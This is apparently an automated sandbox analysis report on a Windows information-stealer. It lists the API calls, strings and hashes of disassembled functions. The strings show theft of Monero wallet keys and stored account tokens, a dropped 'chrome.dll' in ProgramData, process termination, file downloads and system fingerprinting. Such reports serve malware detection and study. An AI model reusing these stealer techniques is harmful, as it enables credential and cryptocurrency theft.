                                  • Opcode Fuzzy Hash: dff33f3ae8903ef17bb409b3740c6d15a7788c4f47000cd75accf46bfbb95c88
                                  • Instruction Fuzzy Hash: 85612BB190519CDBDB24DB51CC45BDAB7B8BF48300F0081E9E649A6241EBB46BC9CFA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0145D848,00000000,?,00800E14,00000000,?,00000000), ref: 007F82C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F82C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007F82E8
                                  • __aulldiv.LIBCMT ref: 007F8302
                                  • __aulldiv.LIBCMT ref: 007F8310
                                  • wsprintfA.USER32 ref: 007F833C
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: 71527e99e0bea5ca2ab410c9ba556aa3236336a3448d69df47921f16655faf05
                                  • Instruction ID: ede80aee0829e51a13641025626d52bd010a233eb5692df9fee3153807ede612
                                  • Opcode Fuzzy Hash: 71527e99e0bea5ca2ab410c9ba556aa3236336a3448d69df47921f16655faf05
                                  • Instruction Fuzzy Hash: DD21F7B1E44208ABDB10DFD4CC49FAEB7B9FB44B10F104619F715BB290C7B859018BA5
                                  APIs
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                  • wsprintfA.USER32 ref: 007E9E7F
                                  • memset.MSVCRT ref: 007E9EED
                                  • lstrcat.KERNEL32(00000000,?), ref: 007E9F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 007E9F17
                                  • lstrcat.KERNEL32(00000000,008012D8), ref: 007E9F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 007E9F7C
                                  • memset.MSVCRT ref: 007E9F9C
                                  • Sleep.KERNEL32(00001388), ref: 007EA013
                                    • Part of subcall function 007F99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F99C5
                                    • Part of subcall function 007F99A0: Process32First.KERNEL32(007EA056,00000128), ref: 007F99D9
                                    • Part of subcall function 007F99A0: Process32Next.KERNEL32(007EA056,00000128), ref: 007F99F2
                                    • Part of subcall function 007F99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F9A4E
                                    • Part of subcall function 007F99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 007F9A6C
                                    • Part of subcall function 007F99A0: CloseHandle.KERNEL32(00000000), ref: 007F9A79
                                    • Part of subcall function 007F99A0: CloseHandle.KERNEL32(007EA056), ref: 007F9A88
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 3242155833-2746444292
                                  • Opcode ID: 3daa2193edbf3ee86a55427bb8b72485b46eb03f0ce6b7591dab6af77f3c85af
                                  • Instruction ID: bfcbd5dda841901f39ab43abeecc3a04450ed7cf04e4c90442609192fbbba4de
                                  • Opcode Fuzzy Hash: 3daa2193edbf3ee86a55427bb8b72485b46eb03f0ce6b7591dab6af77f3c85af
                                  • Instruction Fuzzy Hash: 7C5177B1944308ABDB24DBA0DC4AFDE7778AF44700F004598B60DAB2D1EAB59B84CF51
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                    • Part of subcall function 007E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                  • InternetOpenA.WININET(00800DFB,00000001,00000000,00000000,00000000), ref: 007E615F
                                  • StrCmpCA.SHLWAPI(?,0145E350), ref: 007E6197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007E61DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007E6203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 007E622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007E625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 007E6299
                                  • InternetCloseHandle.WININET(?), ref: 007E62A3
                                  • InternetCloseHandle.WININET(00000000), ref: 007E62B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 52780ad28c358bf15246b27bfbfbb7d96e2b6e7a875c39a5f93f6a133ba8732e
                                  • Instruction ID: 74e3ce72694301b0829cad6ac82528f0e06f13274bbefbb96a3317eebd8ad0fb
                                  • Opcode Fuzzy Hash: 52780ad28c358bf15246b27bfbfbb7d96e2b6e7a875c39a5f93f6a133ba8732e
                                  • Instruction Fuzzy Hash: F15173B1A00208ABDF20DF95DC49BEE7779BB44741F004198F705A71D1DBB86A85CF65
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 0086024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 0086035B
                                  • CatchIt.LIBVCRUNTIME ref: 008603AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 008604C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: d73f8415b1cb14a8446f77c314e6242888f2c05df6436570acec0f22e1085d61
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: C7B16A31800209DFCF25DFA8C8819AFBBB5FF14315F16416AEA11AB212D730DA51CF9A
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  • lstrlen.KERNEL32(00000000), ref: 007EBC6F
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 007EBC9D
                                  • lstrlen.KERNEL32(00000000), ref: 007EBD75
                                  • lstrlen.KERNEL32(00000000), ref: 007EBD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: f34d8ba755d3786dd949efac8e2d3df66c4ef31d861ef861c2b9e12e7d2078c4
                                  • Instruction ID: 7450a1ef6c96b66007f80c5025157e36aa6e3eb2907d76b2ddc230e1052f664e
                                  • Opcode Fuzzy Hash: f34d8ba755d3786dd949efac8e2d3df66c4ef31d861ef861c2b9e12e7d2078c4
                                  • Instruction Fuzzy Hash: 76B105B191010CEBCF14FBA4DD9ADFE7739AF54300F404559F60A622A1EF386A48CB62
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 371498cf5cfd99b8daec4a6c4f7bedbbe79dc9492d72e24d3d178d04125abb75
                                  • Instruction ID: 1a40b3edc7a029ce39e18042c840daeb64e684c58853dd39571b75f64c365855
                                  • Opcode Fuzzy Hash: 371498cf5cfd99b8daec4a6c4f7bedbbe79dc9492d72e24d3d178d04125abb75
                                  • Instruction Fuzzy Hash: D4F03A30908209EFD344DFE4A8097ACBB30AB44706F1183A5E619AA2B1C6B44A519B61
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007F9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007F08DC,C:\ProgramData\chrome.dll), ref: 007F9871
                                    • Part of subcall function 007EA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007EA098
                                  • StrCmpCA.SHLWAPI(00000000,01458AB0), ref: 007F0922
                                  • StrCmpCA.SHLWAPI(00000000,01458A40), ref: 007F0B79
                                  • StrCmpCA.SHLWAPI(00000000,01458AC0), ref: 007F0A0C
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007F0C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 007F0C30
                                  • C:\ProgramData\chrome.dll, xrefs: 007F08CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: f36169c2aeef5d02886e2cdd3e51bdbdd381ada3fbbe9af10124b1afcbfd898e
                                  • Instruction ID: 8588e64d2dc81a89d01006cab31cbcc8789447c68316d8cb0a984a56e9b8aa2f
                                  • Opcode Fuzzy Hash: f36169c2aeef5d02886e2cdd3e51bdbdd381ada3fbbe9af10124b1afcbfd898e
                                  • Instruction Fuzzy Hash: 3CA16571700248EFCF18EF68C996ABD7776EF94300F10816DE50A9F352DA349A09CB92
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 0085FA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0085FA27
                                  • _ValidateLocalCookies.LIBCMT ref: 0085FAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0085FADB
                                  • _ValidateLocalCookies.LIBCMT ref: 0085FB30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: 2f3fee52e6bb3bb9ffdd745064dec27f481376e0203b5fb1ca6caa3372362b41
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: 8141B530900119DBCF11DF68C884A9E7BB5FF45325F148165EE18EB392D7319909CF92
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007E501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E5021
                                  • InternetOpenA.WININET(00800DE3,00000000,00000000,00000000,00000000), ref: 007E503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 007E5061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 007E5091
                                  • InternetCloseHandle.WININET(?), ref: 007E5109
                                  • InternetCloseHandle.WININET(?), ref: 007E5116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: a7395e2ef5997ee6243cfcd364b4c8d27c157c65ce63a525df7e561c807b4b67
                                  • Instruction ID: f2ad0075e844a32ef9f16f92606da8f4c14f224f86cb1bcea949f4e1ac0cb101
                                  • Opcode Fuzzy Hash: a7395e2ef5997ee6243cfcd364b4c8d27c157c65ce63a525df7e561c807b4b67
                                  • Instruction Fuzzy Hash: 4C31FDB4A4421CABDB20DF94DC85BDDB7B4AB48304F1081D8F709A7291D7B46AC58F68
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007F85B6
                                  • wsprintfA.USER32 ref: 007F85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007F860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F8629
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,0145D830,00000000,000F003F,?,00000400), ref: 007F867C
                                  • lstrlen.KERNEL32(?), ref: 007F8691
                                  • RegQueryValueExA.ADVAPI32(00000000,0145D860,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00800B3C), ref: 007F8729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F8798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F87AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 7b4768a1578e39df2f6dc347c74fb4b0917ab39569237236ce81e4cbc224890a
                                  • Instruction ID: 3b7fa051de1aca684a699d4332e5b051eff5246f42a0b4ad12f9cc82306c76a5
                                  • Opcode Fuzzy Hash: 7b4768a1578e39df2f6dc347c74fb4b0917ab39569237236ce81e4cbc224890a
                                  • Instruction Fuzzy Hash: B6212C7191021CABDB64DB94DC85FE9B3B8FB48700F00C1D8E609A6291DF756A85CFE4
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F99C5
                                  • Process32First.KERNEL32(007EA056,00000128), ref: 007F99D9
                                  • Process32Next.KERNEL32(007EA056,00000128), ref: 007F99F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F9A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F9A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 007F9A79
                                  • CloseHandle.KERNEL32(007EA056), ref: 007F9A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: dfe7bf6f442f9b72dbe338b0d893bb85241f5cd7a2ea4005e95fa49af0785f58
                                  • Instruction ID: d7d04a4d7b39d1b6af1f9f81e69afffe0535c9e410e5ad0f72772513216df41f
                                  • Opcode Fuzzy Hash: dfe7bf6f442f9b72dbe338b0d893bb85241f5cd7a2ea4005e95fa49af0785f58
                                  • Instruction Fuzzy Hash: E9210371904218EBDB25DF95DC88BEDB7B5BB48300F1082C8E609A72A0D7759F85CF50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0144BBD0,00000000,00020119,00000000), ref: 007F786D
                                  • RegQueryValueExA.ADVAPI32(00000000,0145D9E0,00000000,00000000,?,000000FF), ref: 007F788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F7898
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 3e5b30b3747361cc63044998eac44cbc704b518ba50fc417af960b85673ab572
                                  • Instruction ID: f8e97937a79f88da034ef39444135af040876ae6d3529f79af509212124f7a7b
                                  • Opcode Fuzzy Hash: 3e5b30b3747361cc63044998eac44cbc704b518ba50fc417af960b85673ab572
                                  • Instruction Fuzzy Hash: DD01F475A44309BBEB04DBE4ED49FAD7778EB48700F104254F705A72A1D6B49901DB60
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F78C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F78CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0144BBD0,00000000,00020119,007F7849), ref: 007F78EB
                                  • RegQueryValueExA.ADVAPI32(007F7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 007F790A
                                  • RegCloseKey.ADVAPI32(007F7849), ref: 007F7914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: c42fec733e37125f4290e0adeac503aff0d2547e96700ded1535e89503cdd10a
                                  • Instruction ID: 0aa9903ecbc7130e904ce16d2482082d933eb986796d269112c1206736e1035b
                                  • Opcode Fuzzy Hash: c42fec733e37125f4290e0adeac503aff0d2547e96700ded1535e89503cdd10a
                                  • Instruction Fuzzy Hash: EB01F4B5A44309BFDB00DBE4DC49FAE7778EB48700F104694F615A6392D7B46A11CBA1
                                  APIs
                                  • memset.MSVCRT ref: 007F4325
                                  • RegOpenKeyExA.ADVAPI32(80000001,0145D478,00000000,00020119,?), ref: 007F4344
                                  • RegQueryValueExA.ADVAPI32(?,0145DC80,00000000,00000000,00000000,000000FF), ref: 007F4368
                                  • RegCloseKey.ADVAPI32(?), ref: 007F4372
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F4397
                                  • lstrcat.KERNEL32(?,0145DD88), ref: 007F43AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 4f008368aab4163b726eb4813e34aca241619d8a1d2142387619bf8aaac86f73
                                  • Instruction ID: 3eec1753991b64b21e81e504c126af9751b4c792aef5f291fdb6385735a3c60b
                                  • Opcode Fuzzy Hash: 4f008368aab4163b726eb4813e34aca241619d8a1d2142387619bf8aaac86f73
                                  • Instruction Fuzzy Hash: 35419CB6900108ABDF14EBE0EC5BFFE737CAB8C700F404658B72556192EE7956988BD1
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                  • LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
